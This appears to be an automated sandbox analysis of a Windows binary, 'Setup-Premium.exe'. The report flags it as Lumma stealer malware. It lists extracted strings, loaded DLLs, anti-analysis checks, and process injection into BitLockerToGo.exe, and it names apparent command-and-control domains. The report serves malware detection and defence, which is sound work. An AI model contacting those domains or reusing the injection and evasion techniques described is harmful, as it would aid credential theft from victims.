                  Source: Setup-Premium.exeString found in binary or memory: tableLog (%d) > maxTableLog (%d)unexpected null character (0x00)sha3: write to sponge after readSigEd25519 no Ed25519 collisionsblake2s: write to XOF after readMILESTONE_FIELD_NAME_REACHED_DATEjetstream not enabled for accountnats: context requires a deadlinerelease of handle with refcount 0crypto/aes: output not full blockbytes.Buffer.Grow: negative countbytes.Reader.Seek: invalid whencetoo many levels of symbolic linksInitializeProcThreadAttributeListImage base beyond allowed addressThunk AddressOfData beyond limitsCentral Kurdish Iraq (ku-Arab-IQ)Norwegian (Bokmal) Norway (nb-NO)could not find signer certificateinvalid VS_VERSION_INFO block. %ssync: RUnlock of unlocked RWMutexslice bounds out of range [%x:%y]runtime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack spanstackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativetoo many concurrent timer firingsruntime: name offset out of rangeruntime: type offset out of rangex509: invalid RSA public exponentx509: SAN rfc822Name is malformedx509: invalid extended key usagescrypto: requested hash function #SigEd25519 no Ed25519 collisions
                  Source: Setup-Premium.exeString found in binary or memory: tableLog (%d) > maxTableLog (%d)unexpected null character (0x00)sha3: write to sponge after readSigEd25519 no Ed25519 collisionsblake2s: write to XOF after readMILESTONE_FIELD_NAME_REACHED_DATEjetstream not enabled for accountnats: context requires a deadlinerelease of handle with refcount 0crypto/aes: output not full blockbytes.Buffer.Grow: negative countbytes.Reader.Seek: invalid whencetoo many levels of symbolic linksInitializeProcThreadAttributeListImage base beyond allowed addressThunk AddressOfData beyond limitsCentral Kurdish Iraq (ku-Arab-IQ)Norwegian (Bokmal) Norway (nb-NO)could not find signer certificateinvalid VS_VERSION_INFO block. %ssync: RUnlock of unlocked RWMutexslice bounds out of range [%x:%y]runtime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack spanstackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativetoo many concurrent timer firingsruntime: name offset out of rangeruntime: type offset out of rangex509: invalid RSA public exponentx509: SAN rfc822Name is malformedx509: invalid extended key usagescrypto: requested hash function #SigEd25519 no Ed25519 collisions
                  Source: Setup-Premium.exeString found in binary or memory: string field contains invalid UTF-8%v already implements proto.Messagemlkem768: invalid ciphertext lengthtoo many Questions to pack (>65535)flate: corrupt input before offset expect [ or , or ] or n, but found invalid control character found: %dtransform: short destination bufferbytes,291403980,opt,name=field_infomessage %v cannot be extended by %v%s: none of the oneof fields is setcannot decode %v into a primitive.Dcannot decode %v into a string typecannot decode %v into a json.Numberbson.Element{[%s]"%s": <malformed>}missing EncodeTime in EncoderConfigchacha20: output smaller than inputcrypto/blake2b: cannot marshal MACsunsupported cipher in private key: Reserved for backward compatibilityfailed to set value %#v to field %sunpaired removeDep: no %T dep on %Tfile %q has a name conflict over %vfound wrong type: got %v, want enumfield match condition not found in BUG: accessing uninitialized bucket%d extra bits on block, should be 0zero matchoff and matchlen (%d) > 0Error while reading from Writer: %s%s: unknown kind to decode into: %s%s: not an object type for map (%T)nanoseconds need at least one digitnumber cannot start with underscoretoml: cannot encode a nil interfaceshould not be called with empty keynumber %f does not fit in a float32bad successive approximation valueshttp2: scheme must be http or https%d response missing Location headerhttp2: Framer %p: read %v. Type: %vPUSH_PROMISE frame with stream ID 0unknown compression method name: %sdelimiters may only be "{}" or "<>"truncated input (or invalid offset)incompatible period types %v and %vincompatible sample types %v and %vmultiple functions with same id: %dmultiple locations with same id: %dpprof: use of uninitialized Profileruntime/pprof: converting profile: mismatched profile records and tagsbasic strings cannot have new linesTLS_KRB5_EXPORT_WITH_DES_CBC_40_SHATLS_KRB5_EXPORT_WITH_RC2_CBC_40_SHATLS_KRB5_EXPORT_WITH_DES_CBC_40_MD5TLS_KRB5_EXPORT_WITH_RC2_CBC_40_MD5TLS_DHE_DSS_WITH_AES_128_CBC_SHA256TLS_DHE_RSA_WITH_AES_128_CBC_SHA256TLS_DHE_DSS_WITH_AES_256_CBC_SHA256TLS_DHE_RSA_WITH_AES_256_CBC_SHA256TLS_DH_anon_WITH_AES_128_CBC_SHA256TLS_DH_anon_WITH_AES_256_CBC_SHA256TLS_DHE_RSA_WITH_AES_128_GCM_SHA256TLS_DHE_RSA_WITH_AES_256_GCM_SHA384TLS_DHE_DSS_WITH_AES_128_GCM_SHA256TLS_DHE_DSS_WITH_AES_256_GCM_SHA384TLS_DH_anon_WITH_AES_128_GCM_SHA256TLS_DH_anon_WITH_AES_256_GCM_SHA384TLS_DHE_PSK_WITH_AES_128_GCM_SHA256TLS_DHE_PSK_WITH_AES_256_GCM_SHA384TLS_RSA_PSK_WITH_AES_128_GCM_SHA256TLS_RSA_PSK_WITH_AES_256_GCM_SHA384TLS_DHE_PSK_WITH_AES_128_CBC_SHA256TLS_DHE_PSK_WITH_AES_256_CBC_SHA384TLS_RSA_PSK_WITH_AES_128_CBC_SHA256TLS_RSA_PSK_WITH_AES_256_CBC_SHA384TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHATLS_ECDH_ECDSA_WITH_AES_256_CBC_SHATLS_ECDH_anon_WITH_3DES_EDE_CBC_SHATLS_ECDHE_PSK_WITH_3DES_EDE_CBC_SHATLS_DH_DSS_WITH_ARIA_128_CBC_SHA256TLS_DH_DSS_WITH_ARIA_256_CBC_SHA384TLS_DH_RSA_WITH_ARIA_128_CBC_SHA256TLS_DH_RSA_WITH_ARIA_256_CBC_SHA384TLS_DH_RSA_WITH_ARIA_128_GCM_SHA256TLS_DH_RSA_WITH_ARIA_256_
                  Source: Setup-Premium.exeString found in binary or memory: string field contains invalid UTF-8%v already implements proto.Messagemlkem768: invalid ciphertext lengthtoo many Questions to pack (>65535)flate: corrupt input before offset expect [ or , or ] or n, but found invalid control character found: %dtransform: short destination bufferbytes,291403980,opt,name=field_infomessage %v cannot be extended by %v%s: none of the oneof fields is setcannot decode %v into a primitive.Dcannot decode %v into a string typecannot decode %v into a json.Numberbson.Element{[%s]"%s": <malformed>}missing EncodeTime in EncoderConfigchacha20: output smaller than inputcrypto/blake2b: cannot marshal MACsunsupported cipher in private key: Reserved for backward compatibilityfailed to set value %#v to field %sunpaired removeDep: no %T dep on %Tfile %q has a name conflict over %vfound wrong type: got %v, want enumfield match condition not found in BUG: accessing uninitialized bucket%d extra bits on block, should be 0zero matchoff and matchlen (%d) > 0Error while reading from Writer: %s%s: unknown kind to decode into: %s%s: not an object type for map (%T)nanoseconds need at least one digitnumber cannot start with underscoretoml: cannot encode a nil interfaceshould not be called with empty keynumber %f does not fit in a float32bad successive approximation valueshttp2: scheme must be http or https%d response missing Location headerhttp2: Framer %p: read %v. Type: %vPUSH_PROMISE frame with stream ID 0unknown compression method name: %sdelimiters may only be "{}" or "<>"truncated input (or invalid offset)incompatible period types %v and %vincompatible sample types %v and %vmultiple functions with same id: %dmultiple locations with same id: %dpprof: use of uninitialized Profileruntime/pprof: converting profile: mismatched profile records and tagsbasic strings cannot have new linesTLS_KRB5_EXPORT_WITH_DES_CBC_40_SHATLS_KRB5_EXPORT_WITH_RC2_CBC_40_SHATLS_KRB5_EXPORT_WITH_DES_CBC_40_MD5TLS_KRB5_EXPORT_WITH_RC2_CBC_40_MD5TLS_DHE_DSS_WITH_AES_128_CBC_SHA256TLS_DHE_RSA_WITH_AES_128_CBC_SHA256TLS_DHE_DSS_WITH_AES_256_CBC_SHA256TLS_DHE_RSA_WITH_AES_256_CBC_SHA256TLS_DH_anon_WITH_AES_128_CBC_SHA256TLS_DH_anon_WITH_AES_256_CBC_SHA256TLS_DHE_RSA_WITH_AES_128_GCM_SHA256TLS_DHE_RSA_WITH_AES_256_GCM_SHA384TLS_DHE_DSS_WITH_AES_128_GCM_SHA256TLS_DHE_DSS_WITH_AES_256_GCM_SHA384TLS_DH_anon_WITH_AES_128_GCM_SHA256TLS_DH_anon_WITH_AES_256_GCM_SHA384TLS_DHE_PSK_WITH_AES_128_GCM_SHA256TLS_DHE_PSK_WITH_AES_256_GCM_SHA384TLS_RSA_PSK_WITH_AES_128_GCM_SHA256TLS_RSA_PSK_WITH_AES_256_GCM_SHA384TLS_DHE_PSK_WITH_AES_128_CBC_SHA256TLS_DHE_PSK_WITH_AES_256_CBC_SHA384TLS_RSA_PSK_WITH_AES_128_CBC_SHA256TLS_RSA_PSK_WITH_AES_256_CBC_SHA384TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHATLS_ECDH_ECDSA_WITH_AES_256_CBC_SHATLS_ECDH_anon_WITH_3DES_EDE_CBC_SHATLS_ECDHE_PSK_WITH_3DES_EDE_CBC_SHATLS_DH_DSS_WITH_ARIA_128_CBC_SHA256TLS_DH_DSS_WITH_ARIA_256_CBC_SHA384TLS_DH_RSA_WITH_ARIA_128_CBC_SHA256TLS_DH_RSA_WITH_ARIA_256_CBC_SHA384TLS_DH_RSA_WITH_ARIA_128_GCM_SHA256TLS_DH_RSA_WITH_ARIA_256_
                  Source: Setup-Premium.exeString found in binary or memory: x509: certificate is not valid for any names, but wanted to match x509: requested SignatureAlgorithm does not match private key typeunable to process scalar node. Got %q. Expecting float content: %w[GET /api/v1/log/entries/{entryUUID}][%d] getLogEntryByUuidOK %+vaccepted signatures do not match threshold, Found: %d, Expected %dreflect: indirection through nil pointer to embedded struct field tls: certificate private key (%T) does not implement crypto.Signerclient doesn't support ECDHE, can only use legacy RSA key exchangetls: server sent an unexpected quic_transport_parameters extensionpkcs7: signing time %q is outside of certificate validity %q to %qcryptobyte: high-tag number identifier octects not supported: 0x%xinternal error: attempted to parse unknown event (please report): If non-empty, use this log file (no effect when -logtostderr=true)If true, adds the file directory to the header of the log messagesDescriptor.Options called without importing the descriptor packagedocument end byte found before end of document. remaining bytes=%vinternal error: expected cumul[s.symbolLen] (%d) == tableSize (%d)uconn.Extensions contains %v separate SupportedVersions extensionstls: writeToUConn is not implemented for the PreSharedKeyExtensiontls: InitializeByUtls failed: the session is not a tls 1.2 sessiontoml: key %s already exists as a %s, but should be an array tablecannot create a subscription for a consumer with a deliver group %q[POST /api/v1/log/entries/retrieve][%d] searchLogQuery default %+vtbsCertList.revokedCertificates.crlEntryExtensions.*.InvalidityDatetls: server sent certificate containing RSA key larger than %d bitsif non-empty, httptest.NewServer serves on this address and blocks.field %v with invalid Mutable call on field with non-composite typeSliceDecodeValue can only decode a binary into a byte array, got %vSliceDecodeValue can only decode a string into a byte array, got %vtls: IsInitialized is not implemented for the PreSharedKeyExtension((a)naly|(b)a|(d)iagno|(p)arenthe|(p)rogno|(s)ynop|(t)he)(sis|ses)$FileAlignment lesser than 0x200 and different from section alignmentdamaged Import Table information. ILT and/or IAT appear to be broken2695994666715063979466701508701963067355791626002630814351006629888126959946667150639794667015087019625940457807714424391721682722368061unable to process scalar node. Got %q. Expecting integer content: %w[GET /api/v1/log/entries/{entryUUID}][%d] getLogEntryByUuidNotFound padding bytes must all be zeros unless AllowIllegalWrites is enabledhttp2: Transport conn %p received error from processing frame %v: %vhttp2: Transport received unsolicited DATA frame; closing connectionhttp: message cannot contain multiple Content-Length headers; got %qx509: failed to unmarshal certificate list authority info access: %vreflect: reflect.Value.UnsafePointer on an invalid notinheap pointertls: internal error: sending non-handshake message to QUIC transportbig: invalid 2nd argument to Int.Jacobi: need odd integer bu
                  Source: Setup-Premium.exeString found in binary or memory: depgithub.com/docker/docker-credential-helpersv0.8.0h1:YQFtbBQb4VrpoPxhFuzEBPQ9E16qz5SpHLS+uswaCp8=
                  Source: Setup-Premium.exeString found in binary or memory: depgithub.com/go-openapi/loadsv0.22.0h1:ECPGd4jX1U6NApCGG1We+uEozOAvXvJSF4nnwHZ8Aco=
                  Source: Setup-Premium.exeString found in binary or memory: github.com/go-openapi/loads.init.0
                  Source: Setup-Premium.exeString found in binary or memory: github.com/go-openapi/loads.(*loader).WithHead
                  Source: Setup-Premium.exeString found in binary or memory: github.com/go-openapi/loads.(*loader).Load
                  Source: Setup-Premium.exeString found in binary or memory: github.com/go-openapi/loads.JSONDoc
                  Source: Setup-Premium.exeString found in binary or memory: github.com/go-openapi/loads.init.1
                  Source: Setup-Premium.exeString found in binary or memory: github.com/go-openapi/loads.init.0.func1
                  Source: Setup-Premium.exeString found in binary or memory: github.com/go-openapi/loads.(*loader).Load-fm
                  Source: Setup-Premium.exeString found in binary or memory: github.com/docker/docker-credential-helpers/credentials.errCredentialsNotFound.Error
                  Source: Setup-Premium.exeString found in binary or memory: github.com/docker/docker-credential-helpers/credentials.errCredentialsNotFound.NotFound
                  Source: Setup-Premium.exeString found in binary or memory: github.com/docker/docker-credential-helpers/credentials.errCredentialsMissingServerURL.Error
                  Source: Setup-Premium.exeString found in binary or memory: github.com/docker/docker-credential-helpers/credentials.errCredentialsMissingServerURL.InvalidParameter
                  Source: Setup-Premium.exeString found in binary or memory: github.com/docker/docker-credential-helpers/credentials.errCredentialsMissingUsername.Error
                  Source: Setup-Premium.exeString found in binary or memory: github.com/docker/docker-credential-helpers/credentials.errCredentialsMissingUsername.InvalidParameter
                  Source: Setup-Premium.exeString found in binary or memory: github.com/docker/docker-credential-helpers/credentials.(*errCredentialsNotFound).Error
                  Source: Setup-Premium.exeString found in binary or memory: github.com/docker/docker-credential-helpers/credentials.(*errCredentialsNotFound).NotFound
                  Source: Setup-Premium.exeString found in binary or memory: github.com/docker/docker-credential-helpers/credentials.(*errCredentialsMissingServerURL).Error
                  Source: Setup-Premium.exeString found in binary or memory: github.com/docker/docker-credential-helpers/credentials.(*errCredentialsMissingServerURL).InvalidParameter
                  Source: Setup-Premium.exeString found in binary or memory: github.com/docker/docker-credential-helpers/credentials.(*errCredentialsMissingUsername).Error
                  Source: Setup-Premium.exeString found in binary or memory: github.com/docker/docker-credential-helpers/credentials.(*errCredentialsMissingUsername).InvalidParameter
                  Source: Setup-Premium.exeString found in binary or memory: type:.eq.github.com/docker/docker-credential-helpers/credentials.Credentials
                  Source: Setup-Premium.exeString found in binary or memory: github.com/docker/docker-credential-helpers/client.Store
                  Source: Setup-Premium.exeString found in binary or memory: github.com/docker/docker-credential-helpers/client.isValidCredsMessage
                  Source: Setup-Premium.exeString found in binary or memory: github.com/docker/docker-credential-helpers/credentials.IsCredentialsMissingServerURLMessage
                  Source: Setup-Premium.exeString found in binary or memory: github.com/docker/docker-credential-helpers/credentials.IsCredentialsMissingUsernameMessage
                  Source: Setup-Premium.exeString found in binary or memory: github.com/docker/docker-credential-helpers/client.Get
                  Source: Setup-Premium.exeString found in binary or memory: github.com/docker/docker-credential-helpers/credentials.IsErrCredentialsNotFoundMessage
                  Source: Setup-Premium.exeString found in binary or memory: github.com/docker/docker-credential-helpers/client.Erase
                  Source: Setup-Premium.exeString found in binary or memory: github.com/docker/docker-credential-helpers/client.List
                  Source: Setup-Premium.exeString found in binary or memory: github.com/docker/docker-credential-helpers/client.createProgramCmdRedirectErr
                  Source: Setup-Premium.exeString found in binary or memory: github.com/docker/docker-credential-helpers/client.(*Shell).Output
                  Source: Setup-Premium.exeString found in binary or memory: github.com/docker/docker-credential-helpers/client.(*Shell).Input
                  Source: Setup-Premium.exeString found in binary or memory: github.com/docker/docker-credential-helpers/credentials.IsErrCredentialsNotFound
                  Source: Setup-Premium.exeString found in binary or memory: github.com/docker/docker-credential-helpers/client.NewShellProgramFunc
                  Source: Setup-Premium.exeString found in binary or memory: github.com/docker/docker-credential-helpers/client.NewShellProgramFuncWithEnv
                  Source: Setup-Premium.exeString found in binary or memory: net/addrselect.go
                  Source: Setup-Premium.exeString found in binary or memory: github.com/sigstore/sigstore@v1.8.9/pkg/signature/options/loadoptions.go
                  Source: Setup-Premium.exeString found in binary or memory: google.golang.org/genproto/googleapis/api@v0.0.0-20240827150818-7e3bb234dfed/launch_stage.pb.go
                  Source: Setup-Premium.exeString found in binary or memory: github.com/go-openapi/swag@v0.23.0/loading.go
                  Source: Setup-Premium.exeString found in binary or memory: github.com/go-openapi/loads@v0.22.0/loaders.go
                  Source: Setup-Premium.exeString found in binary or memory: github.com/go-openapi/loads@v0.22.0/spec.go
                  Source: Setup-Premium.exeString found in binary or memory: github.com/docker/docker-credential-helpers@v0.8.0/credentials/error.go
                  Source: Setup-Premium.exeString found in binary or memory: github.com/docker/docker-credential-helpers@v0.8.0/client/client.go
                  Source: Setup-Premium.exeString found in binary or memory: github.com/docker/docker-credential-helpers@v0.8.0/client/command.go
                  Source: Setup-Premium.exeString found in binary or memory: github.com/docker/distribution@v2.8.3+incompatible/registry/client/auth/challenge/addr.go
                  Source: Setup-Premium.exeString found in binary or memory: github.com/magiconair/properties@v1.8.7/load.go
                  Source: Setup-Premium.exeString found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go
                  Source: Setup-Premium.exeString found in binary or memory: google/api/launch_stage.proto
                  Source: Setup-Premium.exeString found in binary or memory: overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script>
                  Source: C:\Users\user\Desktop\Setup-Premium.exeFile read: C:\Users\user\Desktop\Setup-Premium.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\Setup-Premium.exe "C:\Users\user\Desktop\Setup-Premium.exe"
                  Source: C:\Users\user\Desktop\Setup-Premium.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                  Source: C:\Users\user\Desktop\Setup-Premium.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Setup-Premium.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup-Premium.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: Setup-Premium.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                  Source: Setup-Premium.exeStatic file information: File size 22590464 > 1048576
                  Source: Setup-Premium.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0xa0cc00
                  Source: Setup-Premium.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0xa44800
                  Source: Setup-Premium.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: BitLockerToGo.pdb source: Setup-Premium.exe, 00000000.00000002.2172857628.00000000027A6000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: BitLockerToGo.pdbGCTL source: Setup-Premium.exe, 00000000.00000002.2172857628.00000000027A6000.00000004.00001000.00020000.00000000.sdmp
                  Source: Setup-Premium.exeStatic PE information: section name: .symtab
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0044876C push esp; retf 0047h2_2_0044876D
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00448770 push esp; retf 0047h2_2_00448771
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0043DA60 push eax; mov dword ptr [esp], 37363908h2_2_0043DA65
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00448C8B push esp; retf 0047h2_2_00448C95
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00448D4B push eax; retf 2_2_00448D4D
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00449E6E push ebx; retf 2_2_00449E6F
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0043DE30 push eax; mov dword ptr [esp], FCFDFEFFh2_2_0043DE3A
                  Source: C:\Users\user\Desktop\Setup-Premium.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Found evasive API chain checking for user administrative privileges
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCheck user administrative privileges: IsUserAndAdmin, DecisionNodegraph_2-18339
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 4308Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                  Source: BitLockerToGo.exe, 00000002.00000003.2250209476.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2300154573.0000000002EEC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F20000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2300154573.0000000002F28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: BitLockerToGo.exe, 00000002.00000003.2250209476.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F20000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2300154573.0000000002F28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWz'
                  Source: Setup-Premium.exe, 00000000.00000002.2171311067.0000000001F2C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAPI call chain: ExitProcess graph end nodegraph_2-18340
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0043ACB0 LdrInitializeThunk,2_2_0043ACB0

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Allocates memory in foreign processes
                  Source: C:\Users\user\Desktop\Setup-Premium.exeMemory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\Setup-Premium.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5AJump to behavior
                  LummaC encrypted strings found
                  Source: Setup-Premium.exe, 00000000.00000002.2171424437.0000000002584000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: drawwyobstacw.sbs
                  Source: Setup-Premium.exe, 00000000.00000002.2171424437.0000000002584000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: condifendteu.sbs
                  Source: Setup-Premium.exe, 00000000.00000002.2171424437.0000000002584000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: ehticsprocw.sbs
                  Source: Setup-Premium.exe, 00000000.00000002.2171424437.0000000002584000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: vennurviot.sbsz
                  Source: Setup-Premium.exe, 00000000.00000002.2171424437.0000000002584000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: resinedyw.sbs
                  Source: Setup-Premium.exe, 00000000.00000002.2171424437.0000000002584000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: enlargkiw.sbs
                  Source: Setup-Premium.exe, 00000000.00000002.2171424437.0000000002584000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: allocatinow.sbs
                  Source: Setup-Premium.exe, 00000000.00000002.2171424437.0000000002584000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: mathcucom.sbs
                  Source: Setup-Premium.exe, 00000000.00000002.2171424437.0000000002584000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: proclaimykn.buzz
                  Writes to foreign memory regions
                  Source: C:\Users\user\Desktop\Setup-Premium.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2C9C008Jump to behavior
                  Source: C:\Users\user\Desktop\Setup-Premium.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000Jump to behavior
                  Source: C:\Users\user\Desktop\Setup-Premium.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000Jump to behavior
                  Source: C:\Users\user\Desktop\Setup-Premium.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 445000Jump to behavior
                  Source: C:\Users\user\Desktop\Setup-Premium.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 448000Jump to behavior
                  Source: C:\Users\user\Desktop\Setup-Premium.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 458000Jump to behavior
